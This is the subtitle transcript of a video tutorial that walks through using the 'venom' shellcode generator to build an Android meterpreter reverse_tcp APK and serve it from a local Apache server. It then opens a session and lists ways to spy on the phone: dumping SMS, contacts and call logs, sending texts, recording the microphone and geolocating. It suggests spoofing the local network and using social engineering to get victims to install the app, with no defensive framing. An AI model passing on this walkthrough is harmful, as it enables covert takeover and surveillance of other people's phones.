1
00:00:00,000 --> 00:00:04,260
Hello everybody and in this video I will
show you how you can actually automate

2
00:00:04,259 --> 00:00:08,759
the entire process of hacking Android
and iOS devices. Now in the previous

3
00:00:08,760 --> 00:00:13,920
videos we showed how we can actually hack some Linux systems, we also saw how

4
00:00:13,920 --> 00:00:19,530
we can hack all Windows systems as well. And I also showed you how you can run

5
00:00:19,529 --> 00:00:23,999
the attacks over the Internet.
But right now let's see what we can do

6
00:00:24,000 --> 00:00:31,140
with the Android attacks, for example. So
if I just open up my terminal first, type

7
00:00:31,140 --> 00:00:38,850
in the root password. I will make this
larger so you can see. And what I want to

8
00:00:38,850 --> 00:00:43,770
do right now is go to the Firefox. So
just open up your Firefox. The tool is

9
00:00:43,770 --> 00:00:48,750
called venom I believe, or something like
that. I already have it installed so I

10
00:00:48,750 --> 00:00:52,560
will not install it, but I will show you
from where you can get it. It is on

11
00:00:52,559 --> 00:00:58,079
github. So you just do this simple git
clone and then the link.git, and you

12
00:00:58,079 --> 00:01:04,679
just run the program. It is very simple.
So, venom github right here, and you go to

13
00:01:04,680 --> 00:01:08,490
the first link as it says right here,
github venom Metasploit shellcode

14
00:01:08,490 --> 00:01:14,250
generator. It is a very simple tool to
use. So just copy the link and git clone

15
00:01:14,250 --> 00:01:20,520
it to your directory. As we can see,
download/install. The first part you

16
00:01:20,520 --> 00:01:22,920
need to do is git clone this link right
here,

17
00:01:22,920 --> 00:01:28,170
then set files execution permissions to...so first change directory to the venom,

18
00:01:28,170 --> 00:01:33,570
and then sudo chmod - R + x all
files.

19
00:01:33,570 --> 00:01:39,060
This star right here stands for all files .sh. And also do

20
00:01:39,060 --> 00:01:43,770
that for Python files. If you do not have
dependencies installed you can

21
00:01:43,770 --> 00:01:47,970
run the ./setup.sh, and then after that you can run the main

22
00:01:47,970 --> 00:01:51,840
tool. So, if you do not have all the
dependencies installed and if you do not

23
00:01:51,840 --> 00:01:56,070
download the files to already be
executable, you need to follow these

24
00:01:56,070 --> 00:02:00,660
four steps. Or basically these three
steps. The fourth one is just running the

25
00:02:00,659 --> 00:02:06,559
tool. So, once you do that, you should be
good to go. Let me just find where I

26
00:02:06,560 --> 00:02:11,570
downloaded it...

27
00:02:11,879 --> 00:02:21,429
or we can just locate venom, simple as
that. So locate venom...or maybe it's not.

28
00:02:21,430 --> 00:02:28,300
Okay, so if it is in PythonFiles. Okay, so cd home/user/Desktop/PythonFiles/

29
00:02:28,299 --> 00:02:36,279
venom. So, here you will have these same files right here. If you already ran

30
00:02:36,280 --> 00:02:40,930
the entire installation process, all you
need to do is run this venom.sh

31
00:02:40,930 --> 00:02:46,720
file. So you do that with /vencom.sh, and this will open up the shell code

32
00:02:46,720 --> 00:02:51,430
generator. Now the first thing that it
will ask you is to input your IP address.

33
00:02:51,430 --> 00:02:55,540
Now, if you do not know your IP address
you can just check it with ifconfig. I

34
00:02:55,540 --> 00:03:00,970
know mine, so it is 192.168.1.15,

35
00:03:00,970 --> 00:03:07,060
click here enter, and it will open
this welcome box right here with the

36
00:03:07,060 --> 00:03:11,500
banner. Press enter to continue, we
press enter. It will ask us which

37
00:03:11,500 --> 00:03:16,000
shellcode do we want to generate. Now as we can see right here it doesn't only

38
00:03:16,000 --> 00:03:20,560
generate the Android and iOS payload, you can also also generate the Linux, Windows

39
00:03:20,560 --> 00:03:25,060
and multi-os payloads. Now since we
already covered all of the other ones, we

40
00:03:25,060 --> 00:03:29,800
will just cover the Android ones and iOS.
So just click here 4 which stands for

41
00:03:29,799 --> 00:03:35,019
basically both of these. So just click
4 as a category number. It will say

42
00:03:35,019 --> 00:03:41,139
loading Android | iOS agents. Now since I
don't have the iOS mobile phone with me,

43
00:03:41,139 --> 00:03:46,299
I will go with the Android attack. So
choose agent number, agent number 1

44
00:03:46,299 --> 00:03:51,579
is the Android, so just check here 1. It
will ask you for your IP address once

45
00:03:51,579 --> 00:03:56,259
again since it is specifying it in the
meterpreter as the LHOST, which is your

46
00:03:56,260 --> 00:04:02,680
listening IP address, which is in my case
is 192.168.1.15. And right now

47
00:04:02,680 --> 00:04:07,870
we specify the listening port to be for 444. And the

48
00:04:07,870 --> 00:04:12,220
payload output name, example shell code. So we can name it anything we want. Let's

49
00:04:12,220 --> 00:04:18,580
just name it as they say, so shellcode.
And this will open up this shell code

50
00:04:18,579 --> 00:04:23,409
generator which will generate the
shell code for us. As we can see, some of

51
00:04:23,409 --> 00:04:26,619
these settings down below are LPORT a LHOST that

52
00:04:26,620 --> 00:04:32,080
we set, and the payload that we use is
android/meterpreter/reverse_tcp. Now you

53
00:04:32,080 --> 00:04:36,670
might notice that you can actually use
this payload in the Metasploit framework

54
00:04:36,669 --> 00:04:40,509
as well. So you do not have to automate
this process with this tool if you do

55
00:04:40,509 --> 00:04:44,709
not want to. It is just a lot easier
since it does everything for you. You can

56
00:04:44,710 --> 00:04:51,970
create the payload with msfvenom,
and then run the multi handler as a

57
00:04:51,969 --> 00:04:56,469
listener on your Metasploit framework
console, and perform the same steps as we

58
00:04:56,469 --> 00:04:59,979
did with the Windows exploits, for example. So you just set these options right here, and

59
00:04:59,979 --> 00:05:04,599
check the payload to be android /meterpreter/reverse_tcp. So, let's see what it tells us

60
00:05:04,599 --> 00:05:07,809
right here. Payload stored in home/user, okay so it

61
00:05:07,810 --> 00:05:11,440
made our shell code. It is in this
directory right here as the shellcode.apk,

62
00:05:11,439 --> 00:05:16,689
which is basically the application which is going to run on our Android

63
00:05:16,689 --> 00:05:20,709
device. So what we want to do right here,
is do we want to set up a multi handler

64
00:05:20,710 --> 00:05:25,990
by default, or Apache 2 malicious URL. So
what we want to do is basically set up

65
00:05:25,990 --> 00:05:30,220
Apache 2. Or you can go with the multi
handler as well. I will go with the

66
00:05:30,219 --> 00:05:36,879
Apache 2 right now, and it will start
up by default our listening. As we can

67
00:05:36,879 --> 00:05:41,919
see right here it set all the options,
the LHOST, the LPORT D, the android/

68
00:05:41,919 --> 00:05:46,689
meterpreter/reverse_tcp, and it has
started the reverse_tcp handler on

69
00:05:46,689 --> 00:05:51,969
192.168.1.15,
which is my IP address. So if we go right

70
00:05:51,969 --> 00:06:00,519
here and visit my Apache 2 on my IP
address, my Apache 2 web server, so

71
00:06:00,520 --> 00:06:06,210
192.168.1.15, and we
go right here, as we can see as soon as I

72
00:06:06,210 --> 00:06:12,610
typed in my IP address, it asks me to download the shellcode.apk file. Now

73
00:06:12,610 --> 00:06:16,870
of course I will not download it on my
laptop since it won't really work, but we

74
00:06:16,870 --> 00:06:21,070
can see that the download is automated.
So as soon as you visit this, the process

75
00:06:21,069 --> 00:06:26,559
of the downloading is automatic. So, you
can basically spoof the local area

76
00:06:26,560 --> 00:06:30,280
network and make everyone redirect to
this page, and maybe some of them will

77
00:06:30,279 --> 00:06:34,299
actually download this program. But, that
is not that smart of an attack. So let us

78
00:06:34,300 --> 00:06:36,600
actually I will now open, oops,

79
00:06:36,600 --> 00:06:42,150
I will now open the application from my
mobile phone. So let me open up my mobile

80
00:06:42,150 --> 00:06:46,790
phone. I will type in the IP address, I

81
00:06:47,030 --> 00:06:52,860
will visit it, and as soon as I do it
says this type of file can

82
00:06:52,860 --> 00:06:57,750
harm your device. Do you want to keep
shellcode.apk? Now maybe if you

83
00:06:57,750 --> 00:07:01,110
were able to perform some social
engineering attack, maybe they will click

84
00:07:01,110 --> 00:07:05,850
here ok, and shellcode.apk downloaded in
home. Now you can't see what I am doing

85
00:07:05,850 --> 00:07:10,350
on my mobile phone, but currently I am
downloading the application. Now the most

86
00:07:10,350 --> 00:07:14,430
suspicious part right here is when it
asks, do you want to install this

87
00:07:14,430 --> 00:07:18,810
application? It will get access to modify
system settings, take pictures and

88
00:07:18,810 --> 00:07:24,210
videos, modify your contacts, read your
contacts, access all of the stuff, record

89
00:07:24,210 --> 00:07:29,130
audio, read you text messages, modify or
delete the contents of your SD card,

90
00:07:29,130 --> 00:07:33,390
directly call phone numbers. So that is
everything that we can do with this

91
00:07:33,390 --> 00:07:40,110
application. And if they click install,
and install the application,

92
00:07:40,110 --> 00:07:44,760
it will say that the application, or the

93
00:07:44,760 --> 00:07:48,900
mobile phone doesn't recognize this
producer of this application. You just

94
00:07:48,900 --> 00:07:54,090
click OK and open the application. And as
we can see, as soon as I clicked open we

95
00:07:54,090 --> 00:07:58,890
got the meterpreter session 1 open. So, in
order to check out what your available

96
00:07:58,890 --> 00:08:04,140
option are with the Android payload, you
just type here, whoops not getuid, you

97
00:08:04,140 --> 00:08:08,040
type here help. Let us enlarge this window so we can see

98
00:08:08,040 --> 00:08:13,530
it a little bit better, and you can see
we get some of the additional components,

99
00:08:13,530 --> 00:08:18,690
we get some of the more options than in the previous

100
00:08:18,690 --> 00:08:23,970
exploit, such as check root, dump call log,
so we can get the call log. Dump contacts,

101
00:08:23,970 --> 00:08:27,900
dump SMS, we can read all of the SMS
messages.

102
00:08:27,900 --> 00:08:33,800
Geolocate, send SMS. So we can actually
send SMS. If you just type right here

103
00:08:33,800 --> 00:08:40,560
send_sms, it will tell you the syntax for
sending the SMS. So the send_sms - d for

104
00:08:40,560 --> 00:08:45,480
the destination number, so just select
the destination number, and - d for the

105
00:08:45,480 --> 00:08:49,870
target number. So you can actually send
the SMS message from that

106
00:08:49,870 --> 00:08:55,330
phone to someone. And this is the - t for
the SMS body text, as it says right here,

107
00:08:55,330 --> 00:09:00,220
so this is the message itself. You can
also play the audio, which we can do on

108
00:09:00,220 --> 00:09:04,230
Windows as well, and all of this is the
same as before. Grab screen shot, shell

109
00:09:04,230 --> 00:09:09,220
execute, getuid, so you can see that
I really am on a mobile phone. As we can

110
00:09:09,220 --> 00:09:15,040
see, server user name, this is the name of
the mobile user currently. And you can do

111
00:09:15,040 --> 00:09:20,500
all of this stuff if you wanted to. You
can record microphone, you can go into

112
00:09:20,500 --> 00:09:26,250
shell local time, so basically these are
the more, well basically these are the

113
00:09:26,250 --> 00:09:30,340
important commands, or the new commands, that we didn't cover. These are

114
00:09:30,339 --> 00:09:34,059
the same as in other exploits. As we can
see, the Android commands are right here,

115
00:09:34,060 --> 00:09:38,260
and you might want to actually check out
some of these. We will not be actually

116
00:09:38,260 --> 00:09:42,670
going through them, there is really no
point. You just click here the

117
00:09:42,670 --> 00:09:46,000
name of one of those, and it will give
you the syntax to run it, and you just

118
00:09:46,000 --> 00:09:51,250
run that. So, that would be about it for
this venom.sh tool. I hope you

119
00:09:51,250 --> 00:09:56,550
enjoyed it, and I hope I see you in the
next tutorial. Bye!